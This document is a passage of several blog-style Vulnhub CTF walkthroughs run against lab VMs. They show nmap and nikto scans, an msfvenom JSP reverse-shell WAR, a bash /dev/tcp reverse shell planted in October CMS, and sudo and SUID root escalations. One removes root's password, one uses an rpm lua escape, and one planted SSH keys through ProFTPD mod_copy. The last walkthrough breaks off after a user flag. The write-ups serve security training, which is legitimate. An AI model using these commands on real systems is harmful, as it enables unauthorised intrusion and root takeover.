	PORT     STATE SERVICE VERSION
	22/tcp   open  ssh     OpenSSH 6.6.1 (protocol 2.0)
	| ssh-hostkey: 
	|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
	|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
	|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
	8080/tcp open  http    Apache Tomcat 9.0.31
	|_http-favicon: Apache Tomcat
	|_http-title: Apache Tomcat/9.0.31
	MAC Address: 08:00:27:F7:24:84 (Oracle VirtualBox virtual NIC)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
	Network Distance: 1 hop
	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.44 ms 192.168.2.15

Enumeration :

We can see that there is an open port number 8080. So let us have a look there

Good there a Tomcat Host on the box. For more information, I fired nikto.

#nikto -h http://192.168.2.15:8080/
	
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          192.168.2.15
	+ Target Hostname:    192.168.2.15
	+ Target Port:        8080
	+ Start Time:         2020-04-09 09:54:21 (GMT5.5)
	---------------------------------------------------------------------------
	+ Server: No banner retrieved
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
	+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
	+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
	+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
	+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
	+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
	+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes internal application details.
	+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
	+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
	+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
	+ /axis2/services/Version/getVersion: Apache Axis2 version identified.
	+ /axis2/services/listServices: Apache Axis2 WebServices identified.
	+ /axis2/axis2-web/index.jsp: Apache Axis2 Web Application identified.
	+ /host-manager/status: Default Tomcat Server Status interface found
	+ /manager/status: Tomcat Server Status interface found (pass protected)
	+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host
	+ End Time:           2020-04-09 09:55:13 (GMT5.5) (52 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

Out of all the things, the most important to us is that we have credentials for tomcat manager application, tomcat: tomcat. and the directory /manager/html  page .

We were in the host and found there is a .war file upload option. So without wasting time I use msfvenom to generate a shell.war file

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.1 LPORT=1505 -f war > armour.war
	
	Payload size: 1106 bytes
	The final size of war file: 1106 bytes

Where LHOST = listener host IP  && LPORT = listener port

And we have our payload ready, and we are all set to launch the attack. Upload this shell.war file and call it on the browser while having the listener on, on our machine

#nc -nlvp 1505
	
	listening on [any] 1505 ...
 	connect to [192.168.2.1] from (UNKNOWN) [192.168.2.15] 57094
	id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	hostname
	my_tomcat
	whoami
	tomcat

Got the shell of the user tomcat

Privilege Escalation:

Firstly I converted the shell into the interactive shell and I checked them for permissions on sudo command :

sh-4.2$ id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	sh-4.2$ sudo -l
	Matching Defaults entries for tomcat on this host:
	    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
	    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
	    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
	    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
	    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
	    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
	    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

	User tomcat may run the following commands on this host:
	    (ALL) NOPASSWD:
	    /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java

I see that we can run java command with sudo privileges. You can find the program from any place, I got it on stack overflow.

import java.io.BufferedReader;
	import java.io.InputStreamReader;

	public class armour {  //you have to change thew class same as file name
	    public static void main(String args[]) {
	        String s;
	        Process p;
	        try {
	            p = Runtime.getRuntime().exec("passwd -d root");  //the command you want to execute
	            BufferedReader br = new BufferedReader(
	                new InputStreamReader(p.getInputStream()));
	            while ((s = br.readLine()) != null)
	                System.out.println("line: " + s);
	            p.waitFor();
	            System.out.println ("exit: " + p.exitValue());
	            p.destroy();
	        } catch (Exception e) {}
	    }
	}

now I compile the code and executed it.

bash-4.2$ javac armour.java
	bash-4.2$ sudo java armour
	line: Removing password for user root.
	line: passwd: Success
	exit: 0
	bash-4.2$ su root
	[root@my_tomcat tmp]# id 
	uid=0(root) gid=0(root) groups=0(root)
	[root@my_tomcat tmp]# hostname 
	my_tomcat
	[root@my_tomcat tmp]# whoami 
	root
	[root@my_tomcat tmp]# uname -a
	Linux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
	[root@my_tomcat tmp]# cd /root/
	[root@my_tomcat ~]# ls
	proof.txt
	[root@my_tomcat ~]# cat proof.txt 
	Best of Luck
	628435356e49f976bab2c04948d22fe4
	[root@my_tomcat ~]#

Boom !!! Eureka !!! I Got root …… and here is the flag.

The post My Tomcat Host Vulnhub Walkthrough appeared first on Armour Infosec.

Penetration Testing Methodologies

Network Scan

•  Netdicover
•  Nmap Enumeration

Enumeration

•  Nikto
• Password guessing
• web enumeration

Privilege Escalation

• Capture the Flag.
• password
• Sudo -l

Network Scanning

Without wasting much time a star with the obtaining IP address of the box. I use netdiscover and got the IP 192.168.2.13.

#netdiscover -i vboxnet0                                                                                                                                                                                                                                                                                                                  
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:b8:05:a6      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.13    08:00:27:7a:cd:67      1      60  PCS Systemtechnik GmbH

Let’s proceed with the network scan using Nmap aggressive scan as shown below.

#nmap -p- -A -sS -sC 192.168.2.13

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-08 12:11 IST
Nmap scan report for 192.168.2.13
Host is up (0.00074s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2f:b3:a5:cd:e5:14:33:a1:82:3b:dd:5a:5e:d7:59:36 (DSA)
|_  2048 2d:b4:15:28:36:d8:b5:4e:18:81:8e:af:3e:e4:de:c1 (RSA)
80/tcp open  http    Apache httpd 2.2.15 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
MAC Address: 08:00:27:7A:CD:67 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop
Nmap did: 1 IP address (1 host up) scanned in 164.64 seconds

Enumeration

The first thing we notice is port 80 is open and we see the Apache Test page on the web.

On further enumeration, I came across a /note.txt as shown below. and nothing important to see here.

There is the indexing of /sitemap.xml. Which lead to a new page /index.htnl

The page consists of a gif. So I viewed the page source of the page.

<h1>Keep Calm And HACK</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="1280"> 
<img hidden="True" src="minnions.gif" alt="Hackor" height="640" width="1280">   [here ther is an gif that is hidden ]
<form action = "/cmd.php" hidden="True" method = "GET">  [ here there is a form that is hidden ]
 command
     <input type = "text" name = "AI" value = "" maxlength = "100" />
 <br />
 <input type = "submit" value ="Submit" />
</form>

So I change the hidden part of the code and an “id ” command by /cmd.php 

It worked but not as I respected to be. it gave an error and a clue to use another methodology of HTTP. So I changed the method GET to POST for the form.

Yess I found you.  Now I tried to opening /etc/passwd/ 

On more enumeration, I open /cmd.php and found the password of the user isw0:123456789blabla

 #ssh isw0@192.168.2.13

The authenticity of host '192.168.2.13 (192.168.2.13)' can't be established.
RSA key fingerprint is SHA256:rNHlcfJ22Jb4j6wQvLvKK/+tc9khM8tM3yq9yDiz6dQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.13' (RSA) to the list of known hosts.
isw0@192.168.2.13's password: 
Last login: Thu Feb 13 18:41:34 2020 from 192.168.1.56
[isw0@InfosecWarrior ~]$ whoami
isw0
[isw0@InfosecWarrior html]$ id
uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[isw0@InfosecWarrior html]$ hostname
InfosecWarrior
[isw0@InfosecWarrior ~]$ cat isw0_user 
e4408105ca9c2a5c2714a818c475d06e
[isw0@InfosecWarrior ~]$ 

Got the user flag going for the root flag.

[isw0@InfosecWarrior ~]$ sudo -l
Matching Defaults entries for isw0 on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User isw0 may run the following commands on this host:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ping, (root) /bin/ping6, (root) /bin/rpm, (root) /bin/ls, (root) /bin/mktemp
[isw0@InfosecWarrior ~]$ sudo bash
[sudo] password for isw0: 
Sorry, user isw0 is not allowed to execute '/bin/bash' as root on InfosecWarrior.
[isw0@InfosecWarrior ~]$ sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
[sudo] password for isw0: 
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:rpm_script_t:s0-s0:c0.c1023
sh-4.1# hostname
InfosecWarrior
sh-4.1# cd
sh-4.1# ls
anaconda-ks.cfg  Armour.sh  flag.txt  install.log  install.log.syslog
sh-4.1# cat flag.txt 
fc9c6eb6265921315e7c70aebd22af7e
sh-4.1# exit
exit

Eureka !!!!!! GOT THE FLAG

The post InfoSecWarrior CTF: 1 Walkthrough appeared first on Armour Infosec.

Pentester Methodology

Network Scanning

• nmap
• netdiscover

Enumeration

• nikto
• gobuster
• placing of reverse shell

Privilege Escalation

• abusing SETUID

Network Discovery

In order to get the IP of the machine I used, netdiscover. As I allotted host-only adapter to my machine.

#netdiscover -i vboxnet0

Currently scanning: 192.168.157.0/16   |   Screen View: Unique Hosts                                                                                        
4 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 222               
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.2.2     08:00:27:ac:26:45      1      42  PCS Systemtechnik GmbH      
192.168.2.12    08:00:27:cb:f2:fb      3     180  PCS Systemtechnik GmbH

And got my IP : 192.168.2.12. Now lets begin with nmap scan.

#nmap -A -O -sS -sC -p- 192.168.2.12

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-06 18:59 IST
Nmap scan report for 192.168.2.12
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Homepage | My new websites
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: My Note
MAC Address: 08:00:27:CB:F2:FB (Oracle VirtualBox virtual NIC)

I saw that ports 80 and 8080 are open, so without any delay, I visited the page.

It’s just a normal website. I don’t get anything useful in page source. But still moving forward.

This is also a simple web page. But it consists a clue in the page source to visit 192.168.2.12/mynote.txt

We got credentials for cms admin:adminadmin2. I used nikto for further enumeration but nothing much.

So I tried directory brute-forcing. I used gobuster and found a directory /backend showing the code 302.

#gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://192.168.2.12/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.2.12/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/06 19:14:00 Starting gobuster
===============================================================
/themes (Status: 301)
/modules (Status: 301)
/0 (Status: 200)
/storage (Status: 301)
/plugins (Status: 301)
/backend (Status: 302)
/vendor (Status: 301)
/config (Status: 301)
Progress: 13383 / 220561 (6.07%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/04/06 19:22:15 Finished
===============================================================

Eureka. We got a CMS login page of OCTOBER CMS. I the old credential for the login.

And we are in.. The first checkpoint arrived. Now we need to upload a reverse shell on the CMS in order to get a shell. So for that, we open cms tab on the Dashboard> click on +ADD>enter the details of the page along with the shell>Save it.

function onstart(){
     exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.2.1/1505 0>&1'");
}

Now start the listener on the local machine and call the web page on the web.

#nc -nlvp 1505

listening on [any] 1505 ...
connect to [192.168.2.1] from (UNKNOWN) [192.168.2.12] 4038
bash-5.0$ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation:

Now for the privilege, I got nothing but a local user named armour. Then we checked for suid:

bash-5.0$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/newgrp
/usr/bin/su
/usr/bin/python3
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.7
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

So we got SUID bit configured on /bin/python3. We can approach for the root using this.

bash-5.0$ cd /tmp/
bash-5.0$ vim armour.py 

 #!/usr/bin/python
 import os
 os.execl("/bin/bash","sh","-p")
 ~                                                                               
 ~                                                                               
 ~                                                                               
 ~                                                                               
 :wq!
                                                                                                
bash-5.0$ chmod 777 armour.py 
bash-5.0$ python3 armour.py 

sh-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
sh-5.0# cd /root/
sh-5.0# ls
proof.txt
sh-5.0# cat proof.txt 
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

BOOM! we have the flag and euid of root!!. But we need to get the proper shell so I transfer the authorized_keys to the machine and called for ssh connection.

sh-5.0# cd /root/.ssh
sh-5.0# wget http://192.168.2.1:8080/authorized_keys 
--2020-04-06 10:23:55--  http://192.168.2.1:8080/authorized_keys
Connecting to 192.168.2.1:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569 [application/octet-stream]
Saving to: ‘authorized_keys’

authorized_keys     100%[===================>]     569  --.-KB/s    in 0s      

2020-04-06 10:23:55 (41.3 MB/s) - ‘authorized_keys’ saved [569/569]

sh-5.0# ls 
authorized_keys

#ssh 192.168.2.12
The authenticity of host '192.168.2.12 (192.168.2.12)' can't be established.
ECDSA key fingerprint is SHA256:DYZkjGYMu99f1Ml7F6XHJ+4Oh/GISu41/GP0Y+yMgpg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.12' (ECDSA) to the list of known hosts.
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    It's October	                                        #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################                                       IP:\4
                                       Hostname: \n
Debian GNU/Linux 10
Linux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar 27 10:53:25 2020 from 192.168.1.6

root@october:~# id
uid=0(root) gid=0(root) groups=0(root)
root@october:~# hostname
october
root@october:~# uname -a
Linux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
root@october:~# cd 
root@october:~# cat proof.txt 
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

The post It’s October Vulnhub Walkthrough appeared first on Armour Infosec.

Penetration Testing Methodologies

Network Scan

•  Netdicover
•  Nmap Enumeration

Enumeration

•  Nikto
• Nmap Scripts
•  Injecting authorized_keys via smb
•  ProFTPd 1.3.5  File Copy

Privilege Escalation

• Buffer overflow
• Capture the Flag.
• password
• sudo

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host found is 192.168.2.11

#netdiscover -i vboxnet0

 Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts

 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
 _____________________________________________________________________________
 IP At         MAC Address       Count  Len MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.2.2   08:00:27:25:0f:48  1      42 PCS Systemtechnik GmbH
 192.168.2.11  08:00:27:a8:98:39  1      60 PCS Systemtechnik GmbH

Let’s proceed with a network scan using Nmap aggressive scan as given below.

#nmap -p- -A -sC -O 192.168.2.11

 Nmap scan report for 192.168.2.11
 Not shown: 65523 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp vsftpd 3.0.2
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]
 | ftp-syst:
 | vsFTPd 3.0.2 - secure, fast, stable
 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
 | ssh-hostkey:
 | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
 80/tcp open http Apache httpd 2.4.6 ((CentOS))
 | http-methods:
 |_http-server-header: Apache/2.4.6 (CentOS)
 |_http-title: My File Server
 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
 1337/tcp open waste?
 | fingerprint-strings:
 | GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:
 |_ Why are you here ?!
 2049/tcp open nfs_acl 3 (RPC #100227)
 2121/tcp open ftp ProFTPD 1.3.5
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]
 20048/tcp open mountd 1-3 (RPC #100005)
 35756/tcp open nlockmgr 1-4 (RPC #100021)
 35992/tcp open status 1 (RPC #100024)
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 Device type: general purpose
 Running: Linux 3.X
 OS CPE: cpe:/o:linux:linux_kernel:3
 OS details: Linux 3.4 - 3.10
 Network Distance: 1 hop
 Service Info: Host: FILESERVER; OS: Unix
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Enumeration

It was very interesting. I noticed many ports were open and have Anonymous Login enabled. So I decided to enumerate more with Nmap scripts. Along with port number 80.

#nmap -p 139,445 --script=smb-enum* 192.168.2.11

 Nmap scan report for 192.168.2.11
 PORT STATE SERVICE
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 MAC Address: 08:00:27:A8:98:39 (Oracle VirtualBox virtual NIC)
 Host script results:
 | smb-enum-shares:
 | account_used: <blank>
 | \\192.168.2.11\IPC$:
 | Type: STYPE_IPC_HIDDEN
 | Comment: IPC Service (Samba 4.9.1)
 | Max Users: <unlimited>
 | Path: C:\tmp
 | Anonymous access: READ/WRITE
 | \\192.168.2.11\print$:
 | Type: STYPE_DISKTREE
 | Comment: Printer Drivers
 | Users: 0
 | Max Users: <unlimited>
 | Path: C:\var\lib\samba\drivers
 | Anonymous access: <none>
 | \\192.168.2.11\smbdata:
 | Type: STYPE_DISKTREE
 | Comment: smbdata
 | Users: 0
 | Max Users: <unlimited>
 | Path: C:\smbdata
 | Anonymous access: READ/WRITE
 | \\192.168.2.11\smbuser:
 | Type: STYPE_DISKTREE
 | Comment: smbuser
 | Users: 0
 | Max Users: <unlimited>
 | Path: C:\home\smbuser\
 |_ Anonymous access: <none>
 Nmap done: 1 IP address (1 host up) scanned in 300.66 seconds

We know that there might be a “smbuser” on the network.

I choose to run Nikto for HTTP weak config listing, and found an entry for .ssh

#nikto -h http://192.168.2.11/

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.11
+ Target Hostname: 192.168.2.11
+ Target Port: 80
+ Start Time: 2020-04-06 01:01:31 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

When I tested “.ssh” on web browser….. I got ssh folder, containing id_rsa and authorized_keys.

When I opened authorized_keys. Its confirm that “smbuser” is present in host machine or network.

I download file authorized_keys in my local Linux

#wget http://192.168.2.11/.ssh/authorized_keys

 --2020-04-06 01:05:15--  http://192.168.2.11/.ssh/authorized_keys
 Connecting to 192.168.2.11:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 410
 Saving to: ‘authorized_keys’ 
 authorized_keys         100%[==============================>]     410  --.-KB/s    in 0s      
 2020-04-06 01:05:15 (39.3 MB/s) - ‘authorized_keys’ saved [410/410]

We know that “smbdata” has read and write permission. So if we place the authorized_keys of our Linux and………………

#smbclient //192.168.2.11/smbdata

 Enter WORKGROUP\root's password: 
 Anonymous login successful
 Try "help" to get a list of possible commands.
 smb: \> ls
  .                                   D        0  Mon Apr  6 00:56:56 2020
  ..                                  D        0  Tue Feb 18 17:17:54 2020
  anaconda                            D        0  Tue Feb 18 17:18:15 2020
  audit                               D        0  Tue Feb 18 17:18:15 2020
  boot.log                            N     6120  Tue Feb 18 17:18:16 2020
  btmp                                N      384  Tue Feb 18 17:18:16 2020
  cron                                N     4813  Tue Feb 18 17:18:16 2020
  dmesg                               N    31389  Tue Feb 18 17:18:16 2020
  dmesg.old                           N    31389  Tue Feb 18 17:18:16 2020
  glusterfs                           D        0  Tue Feb 18 17:18:16 2020
  lastlog                             N   292292  Tue Feb 18 17:18:16 2020
  maillog                             N     1982  Tue Feb 18 17:18:16 2020
  messages                            N   684379  Tue Feb 18 17:18:17 2020
  ppp                                 D        0  Tue Feb 18 17:18:17 2020
  samba                               D        0  Tue Feb 18 17:18:17 2020
  secure                              N    11937  Tue Feb 18 17:18:17 2020
  spooler                             N        0  Tue Feb 18 17:18:17 2020
  tallylog                            N        0  Tue Feb 18 17:18:17 2020
  tuned                               D        0  Tue Feb 18 17:18:17 2020
  wtmp                                N    25728  Tue Feb 18 17:18:17 2020
  xferlog                             N      100  Tue Feb 18 17:18:17 2020
  yum.log                             N    10915  Tue Feb 18 17:18:17 2020
  sshd_config                         N     3906  Wed Feb 19 13:16:38 2020
  todo                                N      162  Tue Feb 25 19:52:29 2020
  id_rsa                              N     1766  Thu Mar 19 10:13:16 2020
  note.txt                            N      128  Thu Mar 19 10:23:12 2020

		19976192 blocks of size 1024. 18257932 blocks available
smb: \> exit

#cd .ssh/
#ls
 authorized_keys  id_rsa  id_rsa.pub  known_hosts
#smbclient //192.168.2.11/smbdata
 Enter WORKGROUP\root's password: 
 Anonymous login successful
 Try "help" to get a list of possible commands.
 smb: \> put authorized_keys 
 putting file authorized_keys as \authorized_keys (61.7 kb/s) (average 61.7 kb/s)
 smb: \> 

It is successfully done. We know that port 2121 ProFTPD 1.3.5 has “file copy” vulnerability. So I log in in FTP 2121 without username and password. Then I copy authorized_keys from /smbdata to /home/smbuser/.ssh/authorized_keys

#telnet 192.168.2.11 2121

 Trying 192.168.2.11...
 Connected to 192.168.2.11.
 Escape character is '^]'.
  220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.2.11]
 site help
  214-The following SITE commands are recognized (* =>'s unimplemented)
  CPFR <sp> pathname
  CPTO <sp> pathname
  HELP
  CHGRP
  CHMOD
  214 Direct comments to root@localhost
 site cpfr /smbdata/authorized_keys
  350 File or directory exists, ready for destination name
 site cpto /home/smbuser/.ssh/authorized_keys
 250 Copy successful

Now I tried to take ssh from id_rsa file and yehhhhh we got a smbuser shell…

#ssh smbuser@192.168.2.11 -i id_rsa 

   ##############################################################################################
   #					  InfoSec Warrior                                       #             
   #                         --------- www.InfoSecWarrior.com ------------                      #
   #                                    My File Server - 3					#                    
   #  			    Just a simple addition to the problem                               #
   #                               Designed By :- CyberKnight                                   #
   #                                Twitter    :- @CyberKnight00                                #
   ##############################################################################################

 Last login: Mon Apr  6 01:39:47 2020 from 192.168.2.1
 [smbuser@fileserver ~]$ id 
  uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
 [smbuser@fileserver ~]$ hostname 
  fileserver

Here we got two folders at home but I didn’t get anything and we have no find and locate command for searching suid files. So I have manually searched and I got a file “esclate”  which has suid bit of user bla.

[smbuser@fileserver ~]$  find 
 -bash: find: command not found
[smbuser@fileserver ~]$ ls -lha /usr/bin |grep esclate
 -rwsr-xr-x    1 bla  bla     7.4K Feb 27 00:21 esclate

so from this file, we can try to take “bla ” user shell. After feeding a lot of numbers and alphabets .. sometimes it gives “why are you here?” and sometimes “Segmentation fault” …

So I understood what’s happening here. I gave a value {number} which comes in between both the errors. and yeah “I got the bla user group”

[smbuser@fileserver ~]$ /usr/bin/esclate 
 123456789012345678901234567{27}
 Why are you here ?!
[smbuser@fileserver ~]$ /usr/bin/esclate
 123456789012345687901234567890123456{36}
 Segmentation fault
[smbuser@fileserver ~]$ /usr/bin/esclate          
 1234567890123456789012345678901{32}
 Why are you here ?!
[smbuser@fileserver ~]$ /usr/bin/esclate     
 1234567890123456789012345678901234{34}  
sh-4.2$ id
 uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)
sh-4.2$ hostname 
 fileserver
sh-4.2$ uname -a
 Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
sh-4.2$ 

Then I tried to go access bla directory and yeh I was finally in.

and got FLAG of bla user.

sh-4.2$ cd home
sh-4.2$ ls 
 bla  smbuser
sh-4.2$ cd bla
sh-4.2$ ls -lha
 total 40K
 drwx------  2 bla  bla  121 Feb 27 00:29 .
 drwxr-xr-x. 4 root root  30 Feb 25 16:21 ..
 lrwxrwxrwx  1 bla  bla    9 Feb 25 19:57 .bash_history -> /dev/null
 -rw-r--r--  1 bla  bla   18 Mar  6  2015 .bash_logout
 -rw-r--r--  1 bla  bla  193 Mar  6  2015 .bash_profile
 -rw-r--r--  1 bla  bla  231 Mar  6  2015 .bashrc
 -rw-rw-r--  1 bla  bla  516 Feb 27 00:29 user.txt
 -rw-------  1 bla  bla  731 Feb 26 23:36 .viminfo
